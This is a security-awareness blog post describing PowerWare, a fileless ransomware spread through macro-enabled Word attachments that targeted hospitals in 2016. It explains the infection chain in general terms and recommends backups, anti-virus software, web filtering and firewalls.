Fri, 30 May 2016

PowerWare – A Fileless Ransomware Targeting Hospitals


While businesses of all sizes, government organisations and individuals have all fallen victim to ransomware, it appears that cyber criminals have found 'the sweet spot' and are consolidating their efforts to exploit this very lucrative vulnerability in hospitals and healthcare organisations.


Because they provide critical care, the healthcare sector places high importance in having real-time, up-to-date medical records of their patients. Without these medical records, surgeons would be unable to proceed with life-saving operations, and nurses would not know which medicines to prepare for patients. In short, the workflow of hospitals and other healthcare institutes will be severely disrupted and sickly patients will not be able to receive the healthcare they need. Any delay could be a matter of life or death, and thus, hospitals are more inclined to pay the ransom in the event of a ransomware attack.


This urgency and necessity for hospitals and healthcare organisations to recover encrypted files makes them the perfect target for ransomware hackers, and hackers are sparing no effort in capitalising on this weakness. PowerWare is a prime example of such malware.


Discovered in April 2016, PowerWare is a new strain of ransomware that has been used for launching attacks on hospitals and healthcare organisations. The most interesting and differentiating feature about this malware, is that it is fileless. While several types of existing malware are also fileless, it is uncommon in ransomware.


Its fileless nature also helps the ransomware to evade detection. This is because PowerWare operates without writing any files to the computer's disk, thus making it difficult for security software to scan and detect it.


This is a telling sign that hackers are truly always improving on their craft and are becoming increasingly sophisticated. For us – the common users and organisations, it serves as a gentle reminder to never let our guards down.


To effectively protect against this malware, we must first understand how it works. So, how exactly does this fileless ransomware infect a computer? In order to infiltrate and infect the user's system, PowerWare abuses the macro function of Microsoft Word. Through spam campaigns, hackers disseminate email messages that are attached with a Word document disguised, for example, as an invoice.

example of powerware

In order to open this attachment, the user has to enable macros on his or her computer. While it is a seemingly innocuous course of action to take, enabling macros on Word will cause PowerShell (the native Windows framework used to manage tasks) to download the malicious script automatically. Because no files are tied to the disk, the malware blends in inconspicuously with legitimate activities in the computer, and thus avoids detection. That is, until the warning message demanding a hefty ransom appears.


Ransomware is on the rise, and the high payoff will only attract more cyber criminals to jump on the bandwagon. With the ever-growing number of ransomware cases, many cyber security experts have raised the red flag on this issue. Ransomware is a particularly difficult problem to combat, but it is not impossible to protect yourself and your organisation from these attacks. The most reliable deterrent would be conducting regular backups that are as close to real-time as possible. By doing so, you will be able to restore the infected system with few complications.


Additionally, to further prevent your systems from being infiltrated again, deploy a layered approach using anti-virus software, web filtering and firewalls – and be sure to keep these programmes up to date! As cyber criminals of the nefarious underworld get smarter, more sophisticated and professional, it is crucial that users and organisations also become more vigilant in protecting their data.

Certis CISCO Terms of Use Privacy Policy © 2017 Quann
Back to top